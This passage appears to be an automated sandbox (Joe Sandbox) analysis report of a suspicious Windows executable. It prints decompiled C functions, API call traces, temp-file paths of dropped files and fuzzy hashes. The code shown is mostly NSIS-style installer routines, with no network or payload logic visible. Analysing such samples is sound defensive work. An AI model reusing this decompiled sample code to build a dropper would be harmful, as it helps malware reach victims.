                          0x004062b5
                          0x00000000
                          0x004062b5
                          0x0040626d
                          0x00406270
                          0x0040627b
                          0x00406277
                          0x00406279
                          0x0040627a
                          0x0040627a
                          0x00406282
                          0x00406284
                          0x00000000
                          0x00406284
                          0x0040624e
                          0x00406254
                          0x00000000
                          0x00406254
                          0x00406220
                          0x004061fe
                          0x0040617d
                          0x00406188
                          0x00406191
                          0x00406195
                          0x00000000
                          0x00000000
                          0x00406195
                          0x004062c6

                          APIs
                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                          • GetShortPathNameW.KERNEL32 ref: 00406191
                            • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                            • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                          • GetShortPathNameW.KERNEL32 ref: 004061AE
                          • wsprintfA.USER32 ref: 004061CC
                          • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                          • GlobalFree.KERNEL32 ref: 004062B5
                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                            • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\dhGoVvfmul.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                            • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                          • String ID: %ls=%ls$[Rename]
                          • API String ID: 2171350718-461813615
                          • Opcode ID: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
                          • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                          • Opcode Fuzzy Hash: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
                          • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E00406544(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                          				struct _ITEMIDLIST* _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _t44;
                          				WCHAR* _t45;
                          				signed char _t47;
                          				signed int _t48;
                          				short _t59;
                          				short _t61;
                          				short _t63;
                          				void* _t71;
                          				signed int _t77;
                          				signed int _t78;
                          				short _t81;
                          				short _t82;
                          				signed char _t84;
                          				signed int _t85;
                          				void* _t98;
                          				void* _t104;
                          				intOrPtr* _t105;
                          				void* _t107;
                          				WCHAR* _t108;
                          				void* _t110;
                          
                          				_t107 = __esi;
                          				_t104 = __edi;
                          				_t71 = __ebx;
                          				_t44 = _a8;
                          				if(_t44 < 0) {
                          					_t44 =  *( *0x4291fc - 4 + _t44 * 4);
                          				}
                          				_push(_t71);
                          				_push(_t107);
                          				_push(_t104);
                          				_t105 =  *0x42a258 + _t44 * 2;
                          				_t45 = 0x4281c0;
                          				_t108 = 0x4281c0;
                          				if(_a4 >= 0x4281c0 && _a4 - 0x4281c0 >> 1 < 0x800) {
                          					_t108 = _a4;
                          					_a4 = _a4 & 0x00000000;
                          				}
                          				_t81 =  *_t105;
                          				_a8 = _t81;
                          				if(_t81 == 0) {
                          					L43:
                          					 *_t108 =  *_t108 & 0x00000000;
                          					if(_a4 == 0) {
                          						return _t45;
                          					}
                          					return E00406507(_a4, _t45);
                          				} else {
                          					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                          						_t98 = 2;
                          						_t105 = _t105 + _t98;
                          						if(_t81 >= 4) {
                          							if(__eflags != 0) {
                          								 *_t108 = _t81;
                          								_t108 = _t108 + _t98;
                          								__eflags = _t108;
                          							} else {
                          								 *_t108 =  *_t105;
                          								_t108 = _t108 + _t98;
                          								_t105 = _t105 + _t98;
                          							}
                          							L42:
                          							_t82 =  *_t105;
                          							_a8 = _t82;
                          							if(_t82 != 0) {
                          								_t81 = _a8;
                          								continue;
                          							}
                          							goto L43;
                          						}
                          						_t84 =  *((intOrPtr*)(_t105 + 1));
                          						_t47 =  *_t105;
                          						_t48 = _t47 & 0x000000ff;
                          						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                          						_t85 = _t84 & 0x000000ff;
                          						_v28 = _t48 | 0x00008000;
                          						_t77 = 2;
                          						_v16 = _t85;
                          						_t105 = _t105 + _t77;
                          						_v24 = _t48;
                          						_v20 = _t85 | 0x00008000;
                          						if(_a8 != _t77) {
                          							__eflags = _a8 - 3;
                          							if(_a8 != 3) {
                          								__eflags = _a8 - 1;
                          								if(__eflags == 0) {
                          									__eflags = (_t48 | 0xffffffff) - _v12;
                          									E00406544(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                          								}
                          								L38:
                          								_t108 =  &(_t108[lstrlenW(_t108)]);
                          								_t45 = 0x4281c0;
                          								goto L42;
                          							}
                          							_t78 = _v12;
                          							__eflags = _t78 - 0x1d;
                          							if(_t78 != 0x1d) {
                          								__eflags = (_t78 << 0xb) + 0x42b000;
                          								E00406507(_t108, (_t78 << 0xb) + 0x42b000);
                          							} else {
                          								E0040644E(_t108,  *0x42a228);
                          							}
                          							__eflags = _t78 + 0xffffffeb - 7;
                          							if(__eflags < 0) {
                          								L29:
                          								E0040678E(_t108);
                          							}
                          							goto L38;
                          						}
                          						if( *0x42a2a4 != 0) {
                          							_t77 = 4;
                          						}
                          						_t121 = _t48;
                          						if(_t48 >= 0) {
                          							__eflags = _t48 - 0x25;
                          							if(_t48 != 0x25) {
                          								__eflags = _t48 - 0x24;
                          								if(_t48 == 0x24) {
                          									GetWindowsDirectoryW(_t108, 0x400);
                          									_t77 = 0;
                          								}
                          								while(1) {
                          									__eflags = _t77;
                          									if(_t77 == 0) {
                          										goto L26;
                          									}
                          									_t59 =  *0x42a224;
                          									_t77 = _t77 - 1;
                          									__eflags = _t59;
                          									if(_t59 == 0) {
                          										L22:
                          										_t61 = SHGetSpecialFolderLocation( *0x42a228,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                          										__eflags = _t61;
                          										if(_t61 != 0) {
                          											L24:
                          											 *_t108 =  *_t108 & 0x00000000;
                          											__eflags =  *_t108;
                          											continue;
                          										}
                          										__imp__SHGetPathFromIDListW(_v8, _t108);
                          										_a8 = _t61;
                          										__imp__CoTaskMemFree(_v8);
                          										__eflags = _a8;
                          										if(_a8 != 0) {
                          											goto L26;
                          										}
                          										goto L24;
                          									}
                          									_t63 =  *_t59( *0x42a228,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                          									__eflags = _t63;
                          									if(_t63 == 0) {
                          										goto L26;
                          									}
                          									goto L22;
                          								}
                          								goto L26;
                          							}
                          							GetSystemDirectoryW(_t108, 0x400);
                          							goto L26;
                          						} else {
                          							E004063D5( *0x42a258, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                          							if( *_t108 != 0) {
                          								L27:
                          								if(_v16 == 0x1a) {
                          									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                          								}
                          								goto L29;
                          							}
                          							E00406544(_t77, _t105, _t108, _t108, _v16);
                          							L26:
                          							if( *_t108 == 0) {
                          								goto L29;
                          							}
                          							goto L27;
                          						}
                          					}
                          					goto L43;
                          				}
                          			}





























                          0x00406544
                          0x00406544
                          0x00406544
                          0x0040654a
                          0x0040654f
                          0x00406560
                          0x00406560
                          0x00406568
                          0x00406569
                          0x0040656a
                          0x0040656b
                          0x0040656e
                          0x00406576
                          0x00406578
                          0x00406589
                          0x0040658c
                          0x0040658c
                          0x00406590
                          0x00406596
                          0x00406599
                          0x00406774
                          0x00406774
                          0x0040677f
                          0x0040678b
                          0x0040678b
                          0x00000000
                          0x0040659f
                          0x004065a4
                          0x004065b9
                          0x004065ba
                          0x004065c0
                          0x00406752
                          0x00406760
                          0x00406763
                          0x00406763
                          0x00406754
                          0x00406757
                          0x0040675a
                          0x0040675c
                          0x0040675c
                          0x00406765
                          0x00406765
                          0x0040676b
                          0x0040676e
                          0x004065a1
                          0x00000000
                          0x004065a1
                          0x00000000
                          0x0040676e
                          0x004065c6
                          0x004065c9
                          0x004065d8
                          0x004065df
                          0x004065eb
                          0x004065ee
                          0x004065f1
                          0x004065f2
                          0x004065f7
                          0x004065fd
                          0x00406600
                          0x00406603
                          0x004066f6
                          0x004066fb
                          0x0040672e
                          0x00406733
                          0x00406738
                          0x0040673d
                          0x0040673d
                          0x00406742
                          0x00406748
                          0x0040674b
                          0x00000000
                          0x0040674b
                          0x004066fd
                          0x00406700
                          0x00406703
                          0x00406718
                          0x0040671f
                          0x00406705
                          0x0040670c
                          0x0040670c
                          0x00406727
                          0x0040672a
                          0x004066ee
                          0x004066ef
                          0x004066ef
                          0x00000000
                          0x0040672a
                          0x00406610
                          0x00406614
                          0x00406614
                          0x00406615
                          0x00406617
                          0x00406654
                          0x00406657
                          0x00406667
                          0x0040666a
                          0x00406672
                          0x00406678
                          0x00406678
                          0x004066d3
                          0x004066d3
                          0x004066d5
                          0x00000000
                          0x00000000
                          0x0040667c
                          0x00406681
                          0x00406682
                          0x00406684
                          0x0040669b
                          0x004066a9
                          0x004066af
                          0x004066b1
                          0x004066cf
                          0x004066cf
                          0x004066cf
                          0x00000000
                          0x004066cf
                          0x004066b7
                          0x004066c0
                          0x004066c3
                          0x004066c9
                          0x004066cd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066cd
                          0x00406695
                          0x00406697
                          0x00406699
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406699
                          0x00000000
                          0x004066d3
                          0x0040665f
                          0x00000000
                          0x00406619
                          0x00406637
                          0x00406640
                          0x004066dd
                          0x004066e1
                          0x004066e9
                          0x004066e9
                          0x00000000
                          0x004066e1
                          0x0040664a
                          0x004066d7
                          0x004066db
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066db
                          0x00406617
                          0x00000000
                          0x004065a4

                          APIs
                          • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00000400), ref: 0040665F
                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00000400,00000000,004226E8,?,004055A0,004226E8,00000000,00000000,00418EC0,00000000), ref: 00406672
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Directory$SystemWindowslstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 4260037668-123564855
                          • Opcode ID: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
                          • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                          • Opcode Fuzzy Hash: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
                          • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405569(signed int _a4, WCHAR* _a8) {
                          				struct HWND__* _v8;
                          				signed int _v12;
                          				WCHAR* _v32;
                          				long _v44;
                          				int _v48;
                          				void* _v52;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				WCHAR* _t27;
                          				signed int _t28;
                          				long _t29;
                          				signed int _t37;
                          				signed int _t38;
                          
                          				_t27 =  *0x429204;
                          				_v8 = _t27;
                          				if(_t27 != 0) {
                          					_t37 =  *0x42a2d4;
                          					_v12 = _t37;
                          					_t38 = _t37 & 0x00000001;
                          					if(_t38 == 0) {
                          						E00406544(_t38, 0, 0x4226e8, 0x4226e8, _a4);
                          					}
                          					_t27 = lstrlenW(0x4226e8);
                          					_a4 = _t27;
                          					if(_a8 == 0) {
                          						L6:
                          						if((_v12 & 0x00000004) == 0) {
                          							_t27 = SetWindowTextW( *0x4291e8, 0x4226e8);
                          						}
                          						if((_v12 & 0x00000002) == 0) {
                          							_v32 = 0x4226e8;
                          							_v52 = 1;
                          							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                          							_v44 = 0;
                          							_v48 = _t29 - _t38;
                          							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                          							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                          						}
                          						if(_t38 != 0) {
                          							_t28 = _a4;
                          							0x4226e8[_t28] = 0;
                          							return _t28;
                          						}
                          					} else {
                          						_t27 = lstrlenW(_a8) + _a4;
                          						if(_t27 < 0x1000) {
                          							_t27 = lstrcatW(0x4226e8, _a8);
                          							goto L6;
                          						}
                          					}
                          				}
                          				return _t27;
                          			}

















                          0x0040556f
                          0x00405579
                          0x0040557e
                          0x00405584
                          0x0040558f
                          0x00405592
                          0x00405595
                          0x0040559b
                          0x0040559b
                          0x004055a1
                          0x004055a9
                          0x004055ac
                          0x004055c9
                          0x004055cd
                          0x004055d6
                          0x004055d6
                          0x004055e0
                          0x004055e9
                          0x004055f5
                          0x004055fc
                          0x00405600
                          0x00405603
                          0x00405616
                          0x00405624
                          0x00405624
                          0x00405628
                          0x0040562a
                          0x0040562d
                          0x00000000
                          0x0040562d
                          0x004055ae
                          0x004055b6
                          0x004055be
                          0x004055c4
                          0x00000000
                          0x004055c4
                          0x004055be
                          0x004055ac
                          0x00405639

                          APIs
                          • lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                          • lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                          • lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                          • SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                            • Part of subcall function 00406544: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                            • Part of subcall function 00406544: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: MessageSendlstrlen$lstrcat$TextWindow
                          • String ID: &B
                          • API String ID: 1495540970-3208460036
                          • Opcode ID: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
                          • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                          • Opcode Fuzzy Hash: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
                          • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004044CA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                          				struct tagLOGBRUSH _v16;
                          				long _t39;
                          				long _t41;
                          				void* _t44;
                          				signed char _t50;
                          				long* _t54;
                          
                          				if(_a4 + 0xfffffecd > 5) {
                          					L18:
                          					return 0;
                          				}
                          				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                          					goto L18;
                          				} else {
                          					_t50 = _t54[5];
                          					if((_t50 & 0xffffffe0) != 0) {
                          						goto L18;
                          					}
                          					_t39 =  *_t54;
                          					if((_t50 & 0x00000002) != 0) {
                          						_t39 = GetSysColor(_t39);
                          					}
                          					if((_t54[5] & 0x00000001) != 0) {
                          						SetTextColor(_a8, _t39);
                          					}
                          					SetBkMode(_a8, _t54[4]);
                          					_t41 = _t54[1];
                          					_v16.lbColor = _t41;
                          					if((_t54[5] & 0x00000008) != 0) {
                          						_t41 = GetSysColor(_t41);
                          						_v16.lbColor = _t41;
                          					}
                          					if((_t54[5] & 0x00000004) != 0) {
                          						SetBkColor(_a8, _t41);
                          					}
                          					if((_t54[5] & 0x00000010) != 0) {
                          						_v16.lbStyle = _t54[2];
                          						_t44 = _t54[3];
                          						if(_t44 != 0) {
                          							DeleteObject(_t44);
                          						}
                          						_t54[3] = CreateBrushIndirect( &_v16);
                          					}
                          					return _t54[3];
                          				}
                          			}









                          0x004044dc
                          0x00404592
                          0x00000000
                          0x00404592
                          0x004044ed
                          0x004044f1
                          0x00000000
                          0x0040450b
                          0x0040450b
                          0x00404514
                          0x00000000
                          0x00000000
                          0x00404516
                          0x00404522
                          0x00404525
                          0x00404525
                          0x0040452b
                          0x00404531
                          0x00404531
                          0x0040453d
                          0x00404543
                          0x0040454a
                          0x0040454d
                          0x00404550
                          0x00404552
                          0x00404552
                          0x0040455a
                          0x00404560
                          0x00404560
                          0x0040456a
                          0x0040456f
                          0x00404572
                          0x00404577
                          0x0040457a
                          0x0040457a
                          0x0040458a
                          0x0040458a
                          0x00000000
                          0x0040458d

                          APIs
                          • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                          • GetSysColor.USER32(00000000), ref: 00404525
                          • SetTextColor.GDI32(?,00000000), ref: 00404531
                          • SetBkMode.GDI32(?,?), ref: 0040453D
                          • GetSysColor.USER32(?), ref: 00404550
                          • SetBkColor.GDI32(?,?), ref: 00404560
                          • DeleteObject.GDI32(?), ref: 0040457A
                          • CreateBrushIndirect.GDI32(?), ref: 00404584
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                          • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                          • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                          				intOrPtr _t65;
                          				intOrPtr _t66;
                          				intOrPtr _t72;
                          				void* _t76;
                          				void* _t79;
                          
                          				_t72 = __edx;
                          				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                          				_t65 = 2;
                          				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                          				_t66 = E00402D84(_t65);
                          				_t79 = _t66 - 1;
                          				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                          				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                          				if(_t79 < 0) {
                          					L36:
                          					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
                          				} else {
                          					__ecx = 0x3ff;
                          					if(__eax > 0x3ff) {
                          						 *(__ebp - 0x44) = 0x3ff;
                          					}
                          					if( *__edi == __bx) {
                          						L34:
                          						__ecx =  *(__ebp - 0xc);
                          						__eax =  *(__ebp - 8);
                          						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                          						if(_t79 == 0) {
                          							 *(_t76 - 4) = 1;
                          						}
                          						goto L36;
                          					} else {
                          						 *(__ebp - 0x38) = __ebx;
                          						 *(__ebp - 0x18) = E00406467(__ecx, __edi);
                          						if( *(__ebp - 0x44) > __ebx) {
                          							do {
                          								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                          									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060D8( *(__ebp - 0x18), __ebx) >= 0) {
                          										__eax = __ebp - 0x50;
                          										if(E0040607A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                          											goto L34;
                          										} else {
                          											goto L21;
                          										}
                          									} else {
                          										goto L34;
                          									}
                          								} else {
                          									__eax = __ebp - 0x40;
                          									_push(__ebx);
                          									_push(__ebp - 0x40);
                          									__eax = 2;
                          									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                          									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                          									if(__eax == 0) {
                          										goto L34;
                          									} else {
                          										__ecx =  *(__ebp - 0x40);
                          										if(__ecx == __ebx) {
                          											goto L34;
                          										} else {
                          											__ax =  *(__ebp + 0xa) & 0x000000ff;
                          											 *(__ebp - 0x4c) = __ecx;
                          											 *(__ebp - 0x50) = __eax;
                          											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                          												L28:
                          												__ax & 0x0000ffff = E0040644E( *(__ebp - 0xc), __ax & 0x0000ffff);
                          											} else {
                          												__ebp - 0x50 = __ebp + 0xa;
                          												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                          													L21:
                          													__eax =  *(__ebp - 0x50);
                          												} else {
                          													__edi =  *(__ebp - 0x4c);
                          													__edi =  ~( *(__ebp - 0x4c));
                          													while(1) {
                          														_t22 = __ebp - 0x40;
                          														 *_t22 =  *(__ebp - 0x40) - 1;
                          														__eax = 0xfffd;
                          														 *(__ebp - 0x50) = 0xfffd;
                          														if( *_t22 == 0) {
                          															goto L22;
                          														}
                          														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                          														__edi = __edi + 1;
                          														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                          														__eax = __ebp + 0xa;
                          														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                          															continue;
                          														} else {
                          															goto L21;
                          														}
                          														goto L22;
                          													}
                          												}
                          												L22:
                          												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                          													goto L28;
                          												} else {
                          													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                          														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                          															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                          															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                          														} else {
                          															__ecx =  *(__ebp - 0xc);
                          															__edx =  *(__ebp - 8);
                          															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                          															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                          														}
                          														goto L34;
                          													} else {
                          														__ecx =  *(__ebp - 0xc);
                          														__edx =  *(__ebp - 8);
                          														 *(__ebp - 8) =  *(__ebp - 8) + 1;
